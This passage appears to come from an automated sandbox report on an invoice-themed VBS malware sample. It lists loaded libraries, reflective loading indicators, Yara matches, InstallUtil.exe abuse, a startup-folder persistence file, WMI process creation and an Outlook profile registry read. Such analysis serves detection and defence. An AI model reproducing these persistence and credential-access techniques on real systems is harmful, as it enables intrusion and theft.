                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: pnrpnsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wshbth.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: nlaapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winrnr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Fattura-24SC-99245969925904728562.vbsStatic file information: File size 2500641 > 1048576
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
                Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8400000.2.raw.unpack, MerchantContainerStrategy.cs.Net Code: SearchFilter System.Reflection.Assembly.Load(byte[])
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: Yara matchFile source: 9.2.InstallUtil.exe.23e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A0306A0 push ebx; retf 7_2_0A0306A3
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A03BD0A push B9FFFFFFh; ret 7_2_0A03BD14
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A03E584 push F0B9046Ah; ret 7_2_0A03E58A
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A345319 push B9FFFFE5h; ret 7_2_0A34531E
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A34245C push B9FFFFE4h; ret 7_2_0A342472
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A3438E2 push B9FFFFF9h; ret 7_2_0A3438E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A521E1 push 8BD88B00h; retf 9_2_00A521E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DEE10 push edi; ret 9_2_023DEE16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C335FF push ds; ret 9_2_04C3363A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33547 push es; ret 9_2_04C3354A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C3354B push ss; ret 9_2_04C33562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33563 push ds; ret 9_2_04C335A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33687 push es; ret 9_2_04C33692
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C337CB push ds; ret 9_2_04C337DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C337F3 push es; ret 9_2_04C337F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C337F7 push cs; ret 9_2_04C337FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33797 push ds; ret 9_2_04C3379A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C337A7 push ss; ret 9_2_04C337AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33707 push es; ret 9_2_04C3370A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C3371B push ss; ret 9_2_04C33726
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33727 push cs; ret 9_2_04C3372A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C31897 push BE000000h; retn 0000h9_2_04C3189C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C3389B push ds; ret 9_2_04C338A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C338A7 push es; ret 9_2_04C338AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C338AB push cs; ret 9_2_04C338B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33807 push cs; ret 9_2_04C3380A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C339EF push ss; ret 9_2_04C339F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33983 push cs; ret 9_2_04C33986
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33987 push ds; ret 9_2_04C3398A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C33997 push cs; ret 9_2_04C3399E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C3399F push es; ret 9_2_04C339B6

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeJump to dropped file
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbsJump to dropped file
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbsJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbsJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
